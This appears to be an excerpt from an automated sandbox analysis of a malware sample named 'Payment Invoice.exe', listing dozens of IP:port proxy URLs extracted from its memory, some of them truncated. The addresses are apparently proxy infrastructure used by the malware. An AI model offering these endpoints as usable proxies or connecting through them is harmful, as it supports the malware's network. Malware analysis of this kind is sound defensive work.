                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:38832://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179A7000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:57715
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163179A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.196.31:57715://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:33383
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:33383://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:49865
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:49865://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:8004
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.221.91:8004://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.252.41:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://128.199.252.41:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631997A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631987D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.158.196.9:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.158.196.9:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.18.164.130:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.18.164.130:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.205.138.174:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.213.150.205
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.213.150.205://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://129.213.150.205:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.208.168.179:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.208.168.179:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.209.156.241
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.209.156.241://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.209.156.241:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631964E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.107.106
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319BDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.107.106://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.107.106:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.229.47.109
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.234.24.116:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.234.24.116:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.37.59.99:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.37.59.99:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.38.176.104:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317AA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.38.176.104:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.40.239.130:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.40.239.130:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.59.156.167:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.59.156.167:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.81.217.201
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.162.213.175:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.193.123.34:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://130.193.123.34:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.0.87.225:52017
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.0.87.225:52017://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.233:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.233:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.75:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.75:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.97:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.100.48.97:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.186.37.99:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://131.186.37.99:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:20317
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:20317://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:26606
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:26606://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:29745
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:29745://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:8595
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.88:8595://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:54459
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.128.8:54459://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:60781
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:60781://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:9553
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.129.254:9553://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.97:31406
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.97:31406://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.97:60349
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.154.97:60349://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:27718
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:27718://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:52326
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:52326://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:55610
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.16.169:55610://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.231:46983
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.231:46983://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.243:48298
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.167.243:48298://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:38117
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.169:38117://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.247:26295
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.247:26295://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631737F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163173B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.247:7183
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://132.148.245.247:7183://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.232.90.126
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.232.90.126://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.232.90.126:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.232.90.96
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.232.90.96://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://133.232.90.96:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.22.233:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.22.233:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.122.26.11
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BE5000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.105.209:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.105.209:3128://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.29.120:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.209.29.120:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.35.179.81:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://134.35.179.81:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:31696
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:31696://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:3970
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:3970://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:41146
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:41146://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:51507
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.148.10.161:51507://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.102.118:7117
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://135.181.102.118:7117://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.244.99.51:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://136.244.99.51:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.100.135
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.100.135://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.100.135:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.200.42:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.200.42:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.42.134:12544
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.184.42.134:12544://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C51000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163196F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.220.61.187:10024
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163196F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.220.61.187:10024://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.161.177:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.161.177:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.48.20:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.48.20:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.50.41:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://137.59.50.41:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.143.128:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.0.143.128:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.118.200.49:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.121.15.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.121.15.229:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.121.15.229:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.232:49775
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.201.21.232:49775://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.36.150.16:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.36.150.16:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.235.51
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.235.51://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.235.51:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.24.185:55010
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.24.185:55010://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.24.185:59307
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.24.185:59307://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.60.8:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.68.60.8:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.84.40.117:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.84.40.117:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.94.76.86:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.94.76.86:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.97.14.247:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.97.14.247:80800q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://138.97.14.247:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.0.6.11:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.0.6.11:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:21017
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:21017://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:39652
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.238.184:39652://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.60.36:45701
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.162.60.36:45701://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.196.186.157
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.196.186.157:24001
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.196.186.157:24001://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.224.64.191:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.224.64.191:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.255.132.68:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.255.132.68:1080://proxy
